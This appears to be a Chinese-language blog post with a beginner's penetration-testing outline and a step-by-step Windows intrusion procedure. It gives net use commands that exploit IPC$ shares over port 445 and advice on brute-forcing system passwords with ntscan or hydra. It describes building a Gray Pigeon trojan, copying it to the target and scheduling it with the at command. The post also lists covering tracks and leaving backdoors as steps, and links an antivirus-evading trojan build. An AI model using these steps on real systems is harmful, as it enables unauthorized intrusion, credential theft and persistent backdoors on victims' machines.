目錄
- 簡單滲透測驗思路
- 0.授權
- 1.資訊收集
- 2.掃描漏洞
- 3.漏洞利用
- 4.提權(shell環境、桌面環境 == 最高權限)
- 5.毀尸滅跡
- 6.留后門
- 7.滲透測驗報告
- 簡單滲透測驗程序
- 1.445漏洞之 IPC$
- 2.暴力破解系統密碼之445
- 3.創建后門
- 相關軟體下載
簡單滲透測驗思路
0.授權
1.資訊收集
- nslookup 域名 查IP
- nslookup whois 查子域名
2.掃描漏洞
-
nmap(掃描軟體) scanport(埠掃描)
且利用 telnet 命令也可以探測:telnet IP 埠號,若標題變成 telnet 則說明開放
-
首先基礎掃描 IP 范圍 埠
-
然后再根據埠深入掃描 (IIS,apache,什么網站)
-
高級掃描:
掃描容器漏洞:如 IIS 漏洞 2003-IIS6.0 或 2008-IIS7.0 版本的
掃描網站漏洞(SQL 等)
3.漏洞利用
4.提權(shell環境、桌面環境 == 最高權限)
5.毀尸滅跡
6.留后門
7.滲透測驗報告
簡單滲透測驗程序
1.445漏洞之 IPC$
net use f: \\10.1.1.2\share 密碼 /user:用戶 == 把分享檔案映射到自己電腦
net use f: /del
net use * /del
net use \\10.1.1.2\IPC$ 密碼 /user:用戶 == IPC漏洞
2.暴力破解系統密碼之445
- 軟體:ntscan1.0 //也可用 hydra
- 用字典撰寫軟體撰寫個字典
3.創建后門
- 用灰鴿子制作木馬
- copy 植入木馬
- net time \\10.1.1.2 查看目標當前時間
- at \\10.1.1.2 11:11 “c:\windows\system32\heihei.exe” 創建一個計劃任務,在11:11時運行exe檔案
相關軟體下載
真空密碼字典生成器: https://lanzous.com/ibl5ywd
鴿子牧民戰天免殺專版0912: https://lanzous.com/ibl5y7i
內網埠掃描ScanPort: https://lanzous.com/ibl5y1c
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/24524.html
標籤:其他
上一篇:Cisco實驗:【DHCP配置】客戶端跨網段通過DHCP服務器自動獲取動態IP和固定IP地址
下一篇:BurpSuite環境安裝及設定